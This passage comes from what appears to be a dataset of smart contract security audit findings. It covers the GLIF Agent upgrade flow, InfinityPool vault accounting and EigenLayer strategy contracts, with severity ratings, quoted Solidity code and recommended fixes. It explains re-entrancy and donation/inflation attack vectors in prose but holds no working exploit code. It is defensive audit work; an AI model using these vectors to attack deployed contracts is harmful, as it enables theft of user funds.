oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nThe issue is that the owner can trigger the upgrade even if no new implementation exists. Multiple possible problems derive from it.\\nUpgrading to the current implementation of the Agent will break the logic because the current version is not calling the `migrateMiner` function, so all the miners will stay with the old Agent, and their funds will be lost.\\nThe owner can accidentally trigger multiple upgrades simultaneously, leading to a loss of funds (https://github.com/ConsenSysDiligence/glif-audit-2023-04/issues/2).\\nThe owner also has no control over the new version of the Agent. To increase decentralization, it's better to pass the deployer's address as a parameter additionally.","Ensure the upgrades can only happen when there is a new version of an Agent, and the owner controls this version.",,"```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n" +Potential Re-Entrancy Issues When Upgrading the Contracts,low,"The protocol doesn't have any built-in re-entrancy protection mechanisms. 
That mainly explains by using the `wFIL` token, which is not supposed to give that opportunity. And also by carefully using `FIL` transfers.\\nHowever, there are some places in the code where things may go wrong in the future. For example, when upgrading an Agent:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nHere, we see the `oldAgent.decommissionAgent(newAgent);` call happens before the `oldAgent` is deleted. Inside this function, we see:\\n```\\nfunction decommissionAgent(address \\_newAgent) external {\\n // only the agent factory can decommission an agent\\n AuthController.onlyAgentFactory(router, msg.sender);\\n // if the newAgent has a mismatching ID, revert\\n if(IAgent(\\_newAgent).id() != id) revert Unauthorized();\\n // set the newAgent in storage, which marks the upgrade process as starting\\n newAgent = \\_newAgent;\\n uint256 \\_liquidAssets = liquidAssets();\\n // Withdraw all liquid funds from the Agent to the newAgent\\n \\_poolFundsInFIL(\\_liquidAssets);\\n // transfer funds to new agent\\n payable(\\_newAgent).sendValue(\\_liquidAssets);\\n}\\n```\\n\\nHere, the FIL is transferred to a new contract which is currently unimplemented and unknown. 
Potentially, the fallback function of this contract could trigger a re-entrancy attack. If that's the case, during the execution of this function, there will be two contracts that are active agents with the same ID, and the attacker can try to use that maliciously.","Be very cautious with further implementations of agents and pools. Also, consider using reentrancy protection in public functions.",,"```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n" +InfinityPool Is Subject to a Donation With Inflation Attack if Emtied.,low,"Since `InfinityPool` is an implementation of the ERC4626 vault, it is too susceptible to inflation attacks. An attacker could front-run the first deposit and inflate the share price to an extent where the following deposit will be less than the value of 1 wei of share resulting in 0 shares minted. The attacker could conduct the inflation by means of self-destructing of another contract. In the case of GLIF this attack is less likely on the first pool since GLIF team accepts predeposits so some amount of shares was already minted. 
We do suggest fixing this issue before the next pool is deployed and no pre-stake is generated.\\n```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n","Since the pool does not need to accept donations, the easiest way to handle this case is to use virtual price, where the balance of the contract is duplicated in a separate variable.",,```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? 
assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n +MaxWithdraw Should Potentially Account for the Funds Available in the Ramp.,low,"Since `InfinityPool` is ERC4626 it should also support the `MaxWithdraw` method. According to the EIP it should include any withdrawal limitation that the participant could encounter. At the moment the `MaxWithdraw` function returns the maximum amount of IOU tokens rather than WFIL. Since IOU token is not the `asset` token of the vault, this behavior is not ideal.\\n```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n",We suggest considering returning the maximum amount of WFIL withdrawal which should account for Ramp balance.,,```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n +"The Upgradeability of MinerRegistry, AgentPolice, and Agent Is Overcomplicated and Has a Hight Chance of Errors. Acknowledged",low,"During the engagement, we have identified a few places that signify that the `Agent`, `MinerRegistry` and `AgentPolice` can be upgraded, for example:\\nAbility to migrate the miner from one version of the Agent to another inside the `migrateMiner`.\\nAbility to `refreshRoutes` that would update the `AgentPolice` and `MinerRegistry` addresses for a given Agent.\\nAbility to `decommission` pool. We believe that this functionality is present it is not very well thought through. 
For example, both `MinerRegistry` and `AgentPolice` are not upgradable but have mappings inside of them.\\n```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n\\n```\\nmapping(bytes32 => bool) private \\_minerRegistered;\\n\\nmapping(uint256 => uint64[]) private \\_minersByAgent;\\n```\\n\\nThat means that any time these contracts would need to be upgraded, the contents of those mappings will need to be somehow recreated in the new contract. That is not trivial since it is not easy to obtain all values of a mapping. This will also require an additional protocol-controlled setter ala kickstart mapping functions that are not ideal.\\nIn the case of `Agent` if the contract was upgradable there would be no need for a process of migrating miners that can be tedious and opens possibilities for errors. Since protocol has a lot of centralization and trust assumptions already, having upgradability will not contribute to it a lot.\\nWe also believe that during the upgrade of the pool, the PoolToken will stay the same in the new pool. That means that the minting and burning permissions of the share tokens have to be carefully updated or checked in a manner that does not require the address of the pool to be constant. 
Since we did not have access to this file, we can not check if that is done correctly.",Consider using upgradable contracts or have a solid upgrade plan that is well-tested before an emergency situation occurs.,,```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n +Mint Function in the Infinity Pool Will Emit the Incorrect Value.,low,"In the `InifinityPool` file the `mint` function recomputes the amount of the assets before emitting the event. While this is fine in a lot of cases, that will not always be true. The result of `previewMint` and `convertToAssets` will only be equal while the `totalAssets` and `totalSupply` are equal. 
For example, this assumption will break after the first liquidation.\\n```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n",Use the `assets` value computed by the `previewMint` when emitting the event.,,"```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n" +Potential Overpayment Due to Rounding Imprecision Won't Fix,low,"Inside the `InifintyPool` the `pay` function might accept unaccounted files. Imagine a situation where an Agent is trying to repay only the fees portion of the debt. 
In that case, the following branch will be executed:\\n```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n\\nThe issue is if the `value` does not divide by the `interestPerEpoch` exactly, any remainder will remain in the InfinityPool.\\n```\\nuint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n```\\n","Since the remainder will most likely not be too large this is not critical, but ideally, those remaining funds would be included in the `refund` variable.",,"```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n" +jumpStartAccount Should Be Subject to the Same Approval Checks as Regular Borrow.,low,"`InfinityPool` contract has the ability to kick start an account that will have a debt position in this pool.\\n```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = 
block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n","We suggest that this action is subject to the same rules as the standard borrow action. Thus checks on DTE, LTV and DTI should be done if possible.",,"```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n" +Potential Reentrancy Into Strategies,medium,"The `StrategyManager` contract is the entry point for deposits into and withdrawals from strategies. More specifically, to `deposit` into a strategy, a staker calls `depositIntoStrategy` (or anyone calls `depositIntoStrategyWithSignature` with the staker's signature) then the asset is transferred from the staker to the strategy contract. 
After that, the strategy's `deposit` function is called, followed by some bookkeeping in the `StrategyManager`. For withdrawals (and slashing), the `StrategyManager` calls the strategy's `withdraw` function, which transfers the given amount of the asset to the given recipient. Both token transfers are a potential source of reentrancy if the token allows it.\\nThe `StrategyManager` uses OpenZeppelin's `ReentrancyGuardUpgradeable` as reentrancy protection, and the relevant functions have a `nonReentrant` modifier. The `StrategyBase` contract - from which concrete strategies should be derived - does not have reentrancy protection. However, the functions `deposit` and `withdraw` can only be called from the `StrategyManager`, so reentering these is impossible.\\nNevertheless, other functions could be reentered, for example, `sharesToUnderlyingView` and `underlyingToSharesView`, as well as their (supposedly) non-view counterparts.\\nLet's look at the `withdraw` function in `StrategyBase`. First, the `amountShares` shares are burnt, and at the end of the function, the equivalent amount of `token` is transferred to the depositor:\\n```\\nfunction withdraw(address depositor, IERC20 token, uint256 amountShares)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_WITHDRAWALS)\\n onlyStrategyManager\\n{\\n require(token == underlyingToken, ""StrategyBase.withdraw: Can only withdraw the strategy token"");\\n // copy `totalShares` value to memory, prior to any decrease\\n uint256 priorTotalShares = totalShares;\\n require(\\n amountShares <= priorTotalShares,\\n ""StrategyBase.withdraw: amountShares must be less than or equal to totalShares""\\n );\\n\\n // Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\n uint256 updatedTotalShares = priorTotalShares - amountShares;\\n // check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(updatedTotalShares >= 
MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n ""StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n // Actually decrease the `totalShares` value\\n totalShares = updatedTotalShares;\\n\\n /\\*\\*\\n \\* @notice calculation of amountToSend \\*mirrors\\* `sharesToUnderlying(amountShares)`, but is different since the `totalShares` has already\\n \\* been decremented. Specifically, notice how we use `priorTotalShares` here instead of `totalShares`.\\n \\*/\\n uint256 amountToSend;\\n if (priorTotalShares == amountShares) {\\n amountToSend = \\_tokenBalance();\\n } else {\\n amountToSend = (\\_tokenBalance() \\* amountShares) / priorTotalShares;\\n }\\n\\n underlyingToken.safeTransfer(depositor, amountToSend);\\n}\\n```\\n\\nIf we assume that the `token` contract has a callback to the recipient of the transfer before the actual balance changes take place, then the recipient could reenter the strategy contract, for example, in sharesToUnderlyingView:\\n```\\nfunction sharesToUnderlyingView(uint256 amountShares) public view virtual override returns (uint256) {\\n if (totalShares == 0) {\\n return amountShares;\\n } else {\\n return (\\_tokenBalance() \\* amountShares) / totalShares;\\n }\\n}\\n```\\n\\nThe crucial point is: If the callback is executed before the actual balance change, then `sharesToUnderlyingView` will report a bad result because the shares have already been burnt. 
Still, the token balance has not been updated yet.\\nFor deposits, the token transfer to the strategy happens first, and the shares are minted after that:\\n```\\nfunction \\_depositIntoStrategy(address depositor, IStrategy strategy, IERC20 token, uint256 amount)\\n internal\\n onlyStrategiesWhitelistedForDeposit(strategy)\\n returns (uint256 shares)\\n{\\n // transfer tokens from the sender to the strategy\\n token.safeTransferFrom(msg.sender, address(strategy), amount);\\n\\n // deposit the assets into the specified strategy and get the equivalent amount of shares in that strategy\\n shares = strategy.deposit(token, amount);\\n```\\n\\n```\\nfunction deposit(IERC20 token, uint256 amount)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_DEPOSITS)\\n onlyStrategyManager\\n returns (uint256 newShares)\\n{\\n require(token == underlyingToken, ""StrategyBase.deposit: Can only deposit underlyingToken"");\\n\\n /\\*\\*\\n \\* @notice calculation of newShares \\*mirrors\\* `underlyingToShares(amount)`, but is different since the balance of `underlyingToken`\\n \\* has already been increased due to the `strategyManager` transferring tokens to this strategy prior to calling this function\\n \\*/\\n uint256 priorTokenBalance = \\_tokenBalance() - amount;\\n if (priorTokenBalance == 0 || totalShares == 0) {\\n newShares = amount;\\n } else {\\n newShares = (amount \\* totalShares) / priorTokenBalance;\\n }\\n\\n // checks to ensure correctness / avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(newShares != 0, ""StrategyBase.deposit: newShares cannot be zero"");\\n uint256 updatedTotalShares = totalShares + newShares;\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n ""StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n\\n // update total share amount\\n totalShares = updatedTotalShares;\\n return newShares;\\n}\\n```\\n\\nThat 
means if there is a callback in the token's `transferFrom` function and it is executed after the balance change, a reentering call to `sharesToUnderlyingView` (for example) will again return a wrong result because shares and token balances are not “in sync.”\\nIn addition to the reversed order of token transfer and shares update, there's another vital difference between `withdraw` and deposit: For withdrawals, the call to the token contract originates in the strategy, while for deposits, it is the strategy manager that initiates the call to the token contract (before calling into the strategy). That's a technicality that has consequences for reentrancy protection: Note that for withdrawals, it is the strategy contract that is reentered, while for deposits, there is not a single contract that is reentered; instead, it is the contract system that is in an inconsistent state when the reentrancy happens. Hence, reentrancy protection on the level of individual contracts is not sufficient.\\nFinally, we want to discuss though which functions in the strategy contract the system could be reentered. As mentioned, `deposit` and `withdraw` can only be called by the strategy manager, so these two can be ruled out. For the examples above, we considered `sharesToUnderlyingView`, which (as the name suggests) is a `view` function. As such, it can't change the state of the contract, so reentrancy through a `view` function can only be a problem for other contracts that use this function and rely on its return value. However, there is also a potentially state-changing variant, `sharesToUnderlying`, and similar potentially state-changing functions, such as `underlyingToShares` and `userUnderlying`. Currently, these functions are not actually state-changing, but the idea is that they could be and, in some concrete strategy implementations that inherit from `StrategyBase`, will be. 
In such cases, these functions could make wrong state changes due to state inconsistency during reentrancy.\\nThe examples above assume that the token contract allows reentrancy through its `transfer` function before the balance change has been made or in its `transferFrom` function after. It might be tempting to argue that tokens which don't fall into this category are safe to use. While the examples discussed above are the most interesting attack vectors we found, there might still be others: To illustrate this point, assume a token contract that allows reentrancy through `transferFrom` only before any state change in the token takes place. The token `transfer` is the first thing that happens in `StrategyManager._depositIntoStrategy`, and the state changes (user shares) and calling the strategy's `deposit` function occur later, this might look safe. However, if the `deposit` happens via `StrategyManager.depositIntoStrategyWithSignature`, then it can be seen, for example, that the staker's nonce is updated before the internal `_depositIntoStrategy` function is called:\\n```\\nfunction depositIntoStrategyWithSignature(\\n IStrategy strategy,\\n IERC20 token,\\n uint256 amount,\\n address staker,\\n uint256 expiry,\\n bytes memory signature\\n)\\n external\\n onlyWhenNotPaused(PAUSED\\_DEPOSITS)\\n onlyNotFrozen(staker)\\n nonReentrant\\n returns (uint256 shares)\\n{\\n require(\\n expiry >= block.timestamp,\\n ""StrategyManager.depositIntoStrategyWithSignature: signature expired""\\n );\\n // calculate struct hash, then increment `staker`'s nonce\\n uint256 nonce = nonces[staker];\\n bytes32 structHash = keccak256(abi.encode(DEPOSIT\\_TYPEHASH, strategy, token, amount, nonce, expiry));\\n unchecked {\\n nonces[staker] = nonce + 1;\\n }\\n bytes32 digestHash = keccak256(abi.encodePacked(""\\x19\\x01"", DOMAIN\\_SEPARATOR, structHash));\\n\\n\\n /\\*\\*\\n \\* check validity of signature:\\n \\* 1) if `staker` is an EOA, then `signature` must be a valid ECSDA 
signature from `staker`,\\n \\* indicating their intention for this action\\n \\* 2) if `staker` is a contract, then `signature` must will be checked according to EIP-1271\\n \\*/\\n if (Address.isContract(staker)) {\\n require(IERC1271(staker).isValidSignature(digestHash, signature) == ERC1271\\_MAGICVALUE,\\n ""StrategyManager.depositIntoStrategyWithSignature: ERC1271 signature verification failed"");\\n } else {\\n require(ECDSA.recover(digestHash, signature) == staker,\\n ""StrategyManager.depositIntoStrategyWithSignature: signature not from staker"");\\n }\\n\\n shares = \\_depositIntoStrategy(staker, strategy, token, amount);\\n}\\n```\\n\\nHence, querying the staker's nonce in reentrancy would still give a result based on an “incomplete state change.” It is, for example, conceivable that the staker still has zero shares, and yet their nonce is already 1. This particular situation is most likely not an issue, but the example shows that reentrancy can be subtle.","This is fine if the token doesn't allow reentrancy in the first place. As discussed above, among the tokens that do allow reentrancy, some variants of when reentrancy can happen in relation to state changes in the token seem more dangerous than others, but we have also argued that this kind of reasoning can be dangerous and error-prone. Hence, we recommend employing comprehensive and defensive reentrancy protection based on reentrancy guards such as OpenZeppelin's ReentrancyGuardUpgradeable, which is already used in the `StrategyManager`.\\nUnfortunately, securing a multi-contract system against reentrancy can be challenging, but we hope the preceding discussion and the following pointers will prove helpful:\\nExternal functions in strategies that should only be callable by the strategy manager (such as `deposit` and withdraw) should have the `onlyStrategyManager` modifier. 
This is already the case in the current codebase and is listed here only for completeness.\\nExternal functions in strategies for which item 1 doesn't apply (such as `sharesToUnderlying` and underlyingToShares) should query the strategy manager's reentrancy lock and revert if it is set.\\nIn principle, the restrictions above also apply to `public` functions, but if a `public` function is also used internally, checks against reentrancy can cause problems (if used in an `internal` context) or at least be redundant. In the context of reentrancy protection, it is often easier to split `public` functions into an `internal` and an `external` one.\\nIf `view` functions are supposed to give reliable results (either internally - which is typically the case - or for other contracts), they have to be protected too.\\nThe previous item also applies to the StrategyManager: `view` functions that provide correct results should query the reentrancy lock and revert if it is set.\\nSolidity automatically generates getters for `public` state variables. Again, if these (external view) functions must deliver correct results, the same measures must be taken for explicit `view` functions. In practice, the state variable has to become `internal` or `private`, and the getter function must be hand-written.\\nThe `StrategyBase` contract provides some basic functionality. Concrete strategy implementations can inherit from this contract, meaning that some functions may be overridden (and might or might not call the overridden version via super), and new functions might be added. While the guidelines above should be helpful, derived contracts must be reviewed and assessed separately on a case-by-case basis. 
As mentioned before, reentrancy protection can be challenging, especially in a multi-contract system.",,"```\\nfunction withdraw(address depositor, IERC20 token, uint256 amountShares)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_WITHDRAWALS)\\n onlyStrategyManager\\n{\\n require(token == underlyingToken, ""StrategyBase.withdraw: Can only withdraw the strategy token"");\\n // copy `totalShares` value to memory, prior to any decrease\\n uint256 priorTotalShares = totalShares;\\n require(\\n amountShares <= priorTotalShares,\\n ""StrategyBase.withdraw: amountShares must be less than or equal to totalShares""\\n );\\n\\n // Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\n uint256 updatedTotalShares = priorTotalShares - amountShares;\\n // check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n ""StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n // Actually decrease the `totalShares` value\\n totalShares = updatedTotalShares;\\n\\n /\\*\\*\\n \\* @notice calculation of amountToSend \\*mirrors\\* `sharesToUnderlying(amountShares)`, but is different since the `totalShares` has already\\n \\* been decremented. 
Specifically, notice how we use `priorTotalShares` here instead of `totalShares`.\\n \\*/\\n uint256 amountToSend;\\n if (priorTotalShares == amountShares) {\\n amountToSend = \\_tokenBalance();\\n } else {\\n amountToSend = (\\_tokenBalance() \\* amountShares) / priorTotalShares;\\n }\\n\\n underlyingToken.safeTransfer(depositor, amountToSend);\\n}\\n```\\n" +StrategyBase - Inflation Attack Prevention Can Lead to Stuck Funds,low,"As a defense against what has come to be known as inflation or donation attack in the context of ERC-4626, the `StrategyBase` contract - from which concrete strategy implementations are supposed to inherit - enforces that the amount of shares in existence for a particular strategy is always either 0 or at least a certain minimum amount that is set to 10^9. This mitigates inflation attacks, which require a small total supply of shares to be effective.\\n```\\nuint256 updatedTotalShares = totalShares + newShares;\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n ""StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n```\\n\\n```\\n// Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\nuint256 updatedTotalShares = priorTotalShares - amountShares;\\n// check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n ""StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n```\\n\\nThis particular approach has the downside that, in the worst case, a user may be unable to withdraw the underlying asset for up to 10^9 - 1 shares. 
While the extreme circumstances under which this can happen might be unlikely to occur in a realistic setting and, in many cases, the value of 10^9 - 1 shares may be negligible, this is not ideal.","It isn't easy to give a good general recommendation. None of the suggested mitigations are without a downside, and what's the best choice may also depend on the specific situation. We do, however, feel that alternative approaches that can't lead to stuck funds might be worth considering, especially for a default implementation.\\nOne option is internal accounting, i.e., the strategy keeps track of the number of underlying tokens it owns. It uses this number for conversion rate calculation instead of its balance in the token contract. This avoids the donation attack because sending tokens directly to the strategy will not affect the conversion rate. Moreover, this technique helps prevent reentrancy issues when the EigenLayer state is out of sync with the token contract's state. The downside is higher gas costs and that donating by just sending tokens to the contract is impossible; more specifically, if it happens accidentally, the funds are lost unless there's some special mechanism to recover them.\\nAn alternative approach with virtual shares and assets is presented here, and the document lists pointers to more discussions and proposed solutions.",,"```\\nuint256 updatedTotalShares = totalShares + newShares;\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n ""StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES"");\\n```\\n" +StrategyWrapper - Functions Shouldn't Be virtual (Out of Scope),low,"The `StrategyWrapper` contract is a straightforward strategy implementation and - as its NatSpec documentation explicitly states - is not designed to be inherited from:\\n```\\n/\\*\\*\\n \\* @title Extremely simple implementation of `IStrategy` interface.\\n \\* @author Layr Labs, Inc.\\n \\* @notice Simple, 
basic, ""do-nothing"" Strategy that holds a single underlying token and returns it on withdrawals.\\n \\* Assumes shares are always 1-to-1 with the underlyingToken.\\n \\* @dev Unlike `StrategyBase`, this contract is \\*not\\* designed to be inherited from.\\n \\* @dev This contract is expressly \\*not\\* intended for use with 'fee-on-transfer'-type tokens.\\n \\* Setting the `underlyingToken` to be a fee-on-transfer token may result in improper accounting.\\n \\*/\\ncontract StrategyWrapper is IStrategy {\\n```\\n\\nHowever, all functions in this contract are `virtual`, which only makes sense if inheriting from `StrategyWrapper` is possible.","Assuming the NatSpec documentation is correct, and no contract should inherit from `StrategyWrapper`, remove the `virtual` keyword from all function definitions. Otherwise, fix the documentation.\\nRemark\\nThis contract is out of scope, and this finding is only included because we noticed it accidentally. This does not mean we have reviewed the contract or other out-of-scope files.",,"```\\n/\\*\\*\\n \\* @title Extremely simple implementation of `IStrategy` interface.\\n \\* @author Layr Labs, Inc.\\n \\* @notice Simple, basic, ""do-nothing"" Strategy that holds a single underlying token and returns it on withdrawals.\\n \\* Assumes shares are always 1-to-1 with the underlyingToken.\\n \\* @dev Unlike `StrategyBase`, this contract is \\*not\\* designed to be inherited from.\\n \\* @dev This contract is expressly \\*not\\* intended for use with 'fee-on-transfer'-type tokens.\\n \\* Setting the `underlyingToken` to be a fee-on-transfer token may result in improper accounting.\\n \\*/\\ncontract StrategyWrapper is IStrategy {\\n```\\n" +StrategyBase - Inheritance-Related Issues,low,"A. The `StrategyBase` contract defines `view` functions that, given an amount of shares, return the equivalent amount of tokens (sharesToUnderlyingView) and vice versa (underlyingToSharesView). 
